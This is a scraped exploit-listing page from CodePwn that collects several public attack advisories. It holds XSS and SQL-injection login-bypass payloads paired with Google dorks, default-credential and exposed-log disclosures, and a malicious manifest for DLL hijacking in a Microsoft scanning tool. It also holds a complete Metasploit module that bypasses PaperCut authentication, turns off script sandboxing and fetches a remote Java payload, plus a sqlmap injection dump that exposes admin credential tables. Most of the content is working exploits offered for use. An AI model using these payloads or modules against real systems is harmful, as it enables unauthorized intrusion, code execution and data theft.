Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : mvc-shop v0.5 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | | # Vendor : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5 | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Register a new membership and enter the membership control panel and choose to modify the member's profile and in the name field put any payload that suits you and then save the changes [+] Use Payload : <script>alert(/indoushka/);</script> [+] http://127.0.0.1/chikoiquan.tanhongitcom/ == Greetings to :=========================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ============================================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : NETXPERTS-CMS v0.1 Auth By Pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : http://netxperts.in/ | | # Dork : "Designed by NETXPERTS" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1 [+] https://127.0.0.1/sivasudartravels/admin/production.php Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code>Hi @ll, about a month ago Microsoft published HVCIScan-{amd,arm}64.exe, a "Tool to check devices for compatibility with memory integrity (HVCI)" The "Install instructions" on the download page <https://www.microsoft.com/en-us/download/105217> tell: | Download the hvciscan.exe for your system architecture (AMD64 or ARM64). | From an elevated command window or PowerShell, run hvciscan.exe "ELEVATED" sounds good, especially when such a vulnerable tool is run from the "Downloads" folder, where a file HVCIScan_amd64.exe.manifest, HVCIScan_arm64.exe.manifest or VBSAPI.dll can be placed via "drive-by" download or by the (unsuspecting) unelevated user who still abuses the "protected administrator" account created during Windows setup. Oops, one step back: how did I determine a) that HVCIScan-*.exe is vulnerable b) these filenames? Open an UNELEVATED command window and run LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_amd64.exe and/or LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_arm64.exe then inspect the output. | Dump of file HVCIScan_amd64.exe | | File Type: EXECUTABLE IMAGE | | Image has the following dependencies: | | KERNEL32.dll | msvcrt.dll | VbsApi.dll ~~~~~~~~~~ | Section contains the following load config: | ... | 0000 Dependend load flags ... | Summary | | 1000 .data | 1000 .pdata | 2000 .rdata | 1000 .reloc | 1000 .text OUCH: the guys at M$FT built these tools without embedded "application manifest" (which would have been placed in a ".rsrc" section), so Windows will apply an external "application manifest", and without /DEPENDENTLOADFLAG:2048, so Windows will search dependent DLLs not listed as "Known DLL" in the "application directory" first. Both omissions^WBEGINNER'S MISTAKES allow to load and execute ARBITRARY DLLs from ARBITRARY paths that run with the (ELEVATED) credentials of the application! "Trustworthy Computing" anyone? Or "Security Development Lifecycle"? <https://www.microsoft.com/en-us/securityengineering/sdl> Proof of concept #1: ~~~~~~~~~~~~~~~~~~~~ a) Open an UNELEVATED command window in the directory where you saved HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe b) Create an empty file VbsApi.dll next to the executable: COPY NUL: VbsApi.dll c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error message that VbsApi.dll can't be loaded. Building a VbsApi.dll with the exports required by HVCIScan-a??64.exe to actually load and execute VbsApi.dll is left as an exercise to the reader. See <https://skanthak.homepage.t-online.de/minesweeper.html> if you need help. Proof of concept #2: ~~~~~~~~~~~~~~~~~~~~ a) Create the text file HVCISCAN_amd64.exe.manifest respectively HVCISCAN_arm64.exe.manifest with the following content next to HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe: --- HVCISCAN_a??64.exe.manifest --- <?xml version="1.0" encoding="UTF-8" standalone="yes" ?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="KERNEL32.dll" /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="msvcrt.dll" /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="VbsApi.dll" /> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> </assembly> --- EOF --- Replace the UNC path \\SERVER\SHARE\arbitrary.dll with any local or remote path where you can create the specified file. NOTE: the section "trustInfo" is optional. NOTE: KERNEL32.dll and MSVCRT.dll are "Known DLLs". b) Create an empty file arbitrary.dll in the specified network share or local directory: COPY NUL: \\SERVER\SHARE\arbitrary.dll c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error message that a required DLL or an entry point is not found. Building \\SERVER\SHARE\arbitrary.dll with the exports required by HVCIScan-a??64.exe to actually load and execute arbitrary.dll is left as an exercise to the reader. stay tuned, and far away from "tools" made in Redmond Stefan Kanthak </code></pre>

<pre><code>==================================================================================================================================== | # Title : Anuranan SBAdmin 2 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 113.0.1 (64 bits) | | # Vendor : https://anuranangroup.com/ | | # Dork : Created by: Anuranan Group | ==================================================================================================================================== poc : [+] The vulnerability is about leaving the default settings During the installation of the script and using the default username and password [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user&pass= admin [+] https://127.0.0.1/hpgreenlandresort.com/admin/login.aspx Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'cgi' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'PaperCut PaperCutNG Authentication Bypass', 'Description' => %q{ This module leverages an authentication bypass in PaperCut NG. If necessary it updates Papercut configuration options, specifically the 'print-and-device.script.enabled' and 'print.script.sandboxed' options to allow for arbitrary code execution running in the builtin RhinoJS engine. This module logs at most 2 events in the application log of papercut. Each event is tied to modifcation of server settings. }, 'License' => MSF_LICENSE, 'Author' => ['catatonicprime'], 'References' => [ ['CVE', '2023-27350'], ['ZDI', '23-233'], ['URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219'], ['URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/'], ['URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'], ['URL', 'https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software'] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'Automatic Target', {}] ], 'Platform' => [ 'java' ], 'Arch' => ARCH_JAVA, 'Privileged' => true, 'DisclosureDate' => '2023-03-13', 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => '9191', 'SSL' => 'false' }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']), OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]) ], self.class ) @csrf_token = nil @config_cleanup = [] end def bypass_auth # Attempt to generate a session & recover the anti-csrf token for future requests. res = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'vars_get' => { 'service' => 'page/SetupCompleted' } } ) return nil unless res && res.code == 200 vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}") # Parse the application version from the response for future decisions. product_details = res.get_html_document.xpath('//div[contains(@class, "product-details")]//span').children[1] if product_details.nil? product_details = res.get_html_document.xpath('//span[contains(@class, "version")]') end version_match = product_details.text.match('(?<major>[0-9]+)\.(?<minor>[0-9]+)') @version_major = Integer(version_match[:major]) match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/) @csrf_token = match ? match[:csrf] : '' end def get_config_option(name) # 1) do a quickfind (setting the tapestry state) res = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'headers' => { 'Origin' => full_uri }, 'vars_post' => { 'service' => 'direct/1/ConfigEditor/quickFindForm', 'sp' => 'S0', 'Form0' => '$TextField,doQuickFind,clear', '$TextField' => name, 'doQuickFind' => 'Go' } } ) # 2) parse and return the result return nil unless res && res.code == 200 && (html = res.get_html_document) return nil unless (td = html.xpath("//td[@class='propertyNameColumnValue']")) return nil unless td.count == 1 && td.text == name value_input = html.xpath("//input[@name='$TextField$0']") value_input[0]['value'] end def set_config_option(name, value, rollback) # set name:value pair(s) current_value = get_config_option(name) if current_value == value vprint_good("Server option '#{name}' already set to '#{value}')") return end vprint_status("Setting server option '#{name}' to '#{value}') was '#{current_value}'") res = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'headers' => { 'Origin' => full_uri }, 'vars_post' => { 'service' => 'direct/1/ConfigEditor/$Form', 'sp' => 'S1', 'Form1' => '$TextField$0,$Submit,$Submit$0', '$TextField$0' => value, '$Submit' => 'Update' } } ) fail_with Failure::NotVulnerable, "Could not update server config option '#{name}' to value of '#{value}'" unless res && res.code == 200 # skip storing the cleanup change if this is rolling back a previous change @config_cleanup.push([name, current_value]) unless rollback end def cleanup super if @config_cleanup.nil? return end until @config_cleanup.empty? cfg = @config_cleanup.pop vprint_status("Rolling back '#{cfg[0]}' to '#{cfg[1]}'") set_config_option(cfg[0], cfg[1], true) end end def primer payload_uri = get_uri script = <<~SCRIPT var urls = [new java.net.URL("#{payload_uri}.jar")]; var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]); s; SCRIPT # The number of parameters passed changed in version 17. form0 = 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0' if @version_major > 16 form0 += ',$Submit$1' end # 6) Trigger the code execution the printer_id res = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'headers' => { 'Origin' => full_uri }, 'vars_post' => { 'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form', 'sp' => 'S0', 'Form0' => form0, 'enablePrintScript' => 'on', '$Submit$1' => 'Apply', 'printerId' => 'l1001', 'scriptBody' => script } } ) fail_with Failure::NotVulnerable, 'Failed to prime payload.' unless res && res.code == 200 end def check # For the check command bypass_success = bypass_auth if bypass_success.nil? return Exploit::CheckCode::Safe end return Exploit::CheckCode::Vulnerable end def exploit # Main function # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests. bypass_auth unless @csrf_token if @csrf_token.nil? fail_with Failure::NotVulnerable, 'Target is not vulnerable' end # Sandboxing wasn't introduced until version 19 if @version_major >= 19 # 2) Enable scripts, if needed set_config_option('print-and-device.script.enabled', 'Y', false) # 3) Disable sandboxing, if needed set_config_option('print.script.sandboxed', 'N', false) end # 5) Select the printer, this loads it into the tapestry session to be modified res = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'headers' => { 'Origin' => full_uri }, 'vars_get' => { 'service' => 'direct/1/PrinterList/selectPrinter', 'sp' => 'l1001' } } ) fail_with Failure::NotVulnerable, 'Unable to select [Template Printer]' unless res && res.code == 200 Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error # When the server stop due to our timeout, this is raised end def on_request_uri(cli, request) vprint_status("Sending payload for requested uri: #{request.uri}") send_response(cli, payload.raw) end end </code></pre>

<pre><code>==================================================================================================================================== | # Title : Magento eCommerce v 2.4.0 sensitive information disclosure Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : https://devdocs.magento.com/ | | # Dork : Index of /var/log/ | ==================================================================================================================================== poc : [+] Keeping records in an unprotected folder, The logs contain sensitive information such as folder path,etc... [+] Dorking İn Google Or Other Search Enggine . [+] http://127.0.0.1/dawnfrozenfoods.com/var/log/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : wizcyb interactive v2.0 auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://www.wizcyb.com/products.php | | # Dork : powered by wizcyb interactive | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user=1' or 1=1 -- - & pass=1' or 1=1 -- - [+] https://127.0.0.1/www/jobcapsindiacom/admin/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.codester.com/items/20720/ │ │ Vendor : Expert IT Solution │ │ Software : Expert Job Portal Management System 1.0 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /company_type_info.php https://website/company_type_info.php?com_type=Agent GET parameter 'com_type' is vulnerable to SQL Injection --- Parameter: com_type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: com_type=Agent' AND 3360=3360 AND 'rCfC'='rCfC Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: com_type=Agent' AND (SELECT 4512 FROM (SELECT(SLEEP(5)))SCiH) AND 'MKSc'='MKSc Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: com_type=Agent' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171787071,0x5174744e6d58704d494d494952476c6f4c666346534b45754e57696b444b45794e5758567a6e6163,0x71627a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [+] Starting the Attack fetching current database current database: 'sagor_****_job' fetching tables [38 tables] +---------------------------------+ | all_country | | city_manage | | company_type | | contact_manage | | content_manage | | division_manage | | enroll_trainning | | exp_settings | | job_apply | | job_categories | | job_listing | | job_seeker_carieer_details | | job_seeker_education | | job_seeker_emp_histo | | job_seeker_image | | job_seeker_info | | job_seeker_lang_pro | | job_seeker_other_relatiive_info | | job_seeker_pref_details | | job_seeker_profess_info | | job_seeker_reff | | job_seeker_resume | | job_seeker_specialization | | job_seeker_training | | job_seeker_upload_resume | | languages | | package | | pages | | recurator_info | | recurator_verification | | save_jobs | | social_manage | | subscribe | | sup_ad_log | | testmonial_manage | | timezones | | trainning_category | | trainning_manage | +---------------------------------+ fetching columns for table 'sup_ad_log' [6 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | status | int(11) | | admin_role | int(11) | | email | varchar(100) | | id | int(11) | | sup_pass | varchar(100) | | sup_user | varchar(100) | +------------+--------------+ [-] Done</code></pre>